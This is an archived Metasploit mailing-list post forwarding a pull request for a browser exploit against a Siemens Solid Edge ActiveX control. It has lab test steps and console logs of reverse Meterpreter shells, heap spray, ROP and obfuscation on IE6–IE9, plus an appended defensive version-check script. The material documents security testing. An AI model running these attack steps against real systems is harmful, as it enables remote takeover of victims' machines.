Metasploit mailing list archives

Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444)
From: Tod Beardsley <todb () metasploit com>
Date: Tue, 1 Oct 2013 12:12:50 -0500

Best exploit pull request ever. Description of, pointer to, and help
offered with, vulnerable software installation, verification steps, and
screens of alternative exploit scenarios in action.

Thanks Juan! I'll want to work this into the documentation on "How to PR
against Metasploit" some day soon.


---------- Forwarded message ----------
From: Juan Vazquez <notifications () github com>
Date: Tue, Oct 1, 2013 at 11:52 AM
Subject: [metasploit-framework] Add module for OSVDB 93696 (#2444)
To: rapid7/metasploit-framework <metasploit-framework () noreply github com>


From the original advisory the software can be located:

http://www.exploit-db.com/exploits/25712/

software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
download url:
http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
file tested: SolidEdgeV104ENGLISH_32Bit.exe

Downloaded some time ago, don't know if the installer is available still.
email me if you need the installer and it isn't available on the vendor
site anymore.

In order to test:

   -  Install as many combinations as you would like to test of Windows
   XPSP3, Vista, 7SP1 / IE6-IE9 / SolidEdgeV104ENGLISH_32Bit.exe
   -  Verify versions of the targeted components: Jutil.dll 104.0.0.82 and
   SEListCtrlX 104.0.0.82
   -  Start msfconsole, select the module and run the exploit
   -  In the browser, go to the link provided by the module. It should
   provide a shell. It is using Heap Spray so expect some fails from time to
   time. But the module should be reliable enough.
   -  If you would like to verify javascript OBFUSCATION for the heap
   spray, "set OBFUSCATE true" on the msfconsole once the exploit has been
   selected, before exploit.

Testing examples (IE6 to IE9 on XP SP3 and 7 SP1) :

*IE6 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 6 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49707)
at 2013-10-01 10:06:17 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49707) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1692)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3564
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 1 closed.  Reason: User exit

*IE 7 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 7 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49921)
at 2013-10-01 10:16:26 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49921) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1056)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3664
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 3 closed.  Reason: User exit



   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Target selected
as: IE 7 on Windows XP SP3
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 6 opened (172.16.240.1:4444 ->
172.16.240.1:50605) at 2013-10-01 11:40:20 -0500
[*] Session ID 6 (172.16.240.1:4444 -> 172.16.240.1:50605) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1340)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2440
[+] Successfully migrated to process


*IE 8 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /CyzchAko9Lj0
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:50169)
at 2013-10-01 10:56:24 -0500
[*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:50169) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1764

[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 4 closed.  Reason: User exit


   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows XP SP3
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 5 opened (172.16.240.1:4444 ->
172.16.240.1:50596) at 2013-10-01 11:36:57 -0500
[*] Session ID 5 (172.16.240.1:4444 -> 172.16.240.1:50596) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2960)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3400
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.240.1 - Meterpreter session 5 closed.  Reason: User exit


*IE8 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /QGQFAoQKQPfO
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows 7
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50519)
at 2013-10-01 11:21:05 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:50519) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3888)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1000

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

[+] Successfully migrated to process
meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.140 - Meterpreter session 1 closed.  Reason: User exit


   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444
[*] Using URL: http://0.0.0.0:8080/Bqg4d70LeyFC
[*]  Local IP: http://10.6.0.165:8080/Bqg4d70LeyFC
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /Bqg4d70LeyFC
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows 7
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50583)
at 2013-10-01 11:29:29 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:50583) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2416)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 156
[+] Successfully migrated to process


*IE9 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142
siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 3 opened (172.16.240.1:4444 ->
172.16.240.142:49159) at 2013-10-01 11:32:21 -0500
[*] Session ID 3 (172.16.240.1:4444 -> 172.16.240.142:49159)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3200)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3700
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.240.142 - Meterpreter session 3 closed.  Reason: User exit



   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.240.1:4444
[*] Using URL: http://172.16.240.1:8080/581APDrO
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142
siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 4 opened (172.16.240.1:4444 ->
172.16.240.142:49162) at 2013-10-01 11:34:18 -0500
[*] Session ID 4 (172.16.240.1:4444 -> 172.16.240.142:49162)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (604)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process


------------------------------
You can merge this Pull Request by running

  git pull https://github.com/jvazquez-r7/metasploit-framework osvdb_93696

Or view, comment on, or merge it at:

  https://github.com/rapid7/metasploit-framework/pull/2444
Commit Summary

   - Add module for OSVDB 93696

File Changes

   - *A* modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb <https://github.com/rapid7/metasploit-framework/pull/2444/files#diff-0> (500)

Patch Links:

   - https://github.com/rapid7/metasploit-framework/pull/2444.patch
   - https://github.com/rapid7/metasploit-framework/pull/2444.diff
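The second test step above asks the tester to confirm the build of the two targeted components. The following PowerShell inventory script is an added example for the defender's side of that check and is not part of the pull request or the Metasploit module; it assumes the components sit somewhere under the Program Files trees, and since the PR gives no file extension for the SEListCtrlX control, the filter matches any extension.

```powershell
# Added example (not from the pull request or the Metasploit module).
# Locates Jutil.dll and the SEListCtrlX control and reports whether the
# installed build is the one the PR reports as tested (104.0.0.82).
# Assumed: both files live under a Program Files tree; the extension of
# the SEListCtrlX file is unknown, so 'SEListCtrlX.*' is used as the filter.

$testedVersion = [version]'104.0.0.82'
$filters = @('Jutil.dll', 'SEListCtrlX.*')
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ -and (Test-Path -LiteralPath $_) }

$findings = foreach ($root in $roots) {
    foreach ($filter in $filters) {
        Get-ChildItem -Path $root -Filter $filter -Recurse -File -ErrorAction SilentlyContinue |
            ForEach-Object {
                $raw = $_.VersionInfo.FileVersion
                # FileVersion strings may carry trailing text; keep only the
                # leading dotted number so it can be compared as a [version].
                $parsed = $null
                if ($raw -and ($raw -match '^\s*(\d+(\.\d+){1,3})')) {
                    $parsed = [version]$Matches[1]
                }
                [pscustomobject]@{
                    Path          = $_.FullName
                    FileVersion   = $raw
                    MatchesTested = ($null -ne $parsed -and $parsed -eq $testedVersion)
                }
            }
    }
}

if (-not $findings) {
    Write-Output 'Neither Jutil.dll nor a SEListCtrlX file was found under Program Files.'
} else {
    $findings | Format-Table -AutoSize
    if ($findings | Where-Object MatchesTested) {
        Write-Warning 'Installed build matches the component versions the module was tested against.'
    }
}
```

Run it in an elevated session on the workstation being inventoried; a recursive search of both Program Files trees can take a minute on a large install.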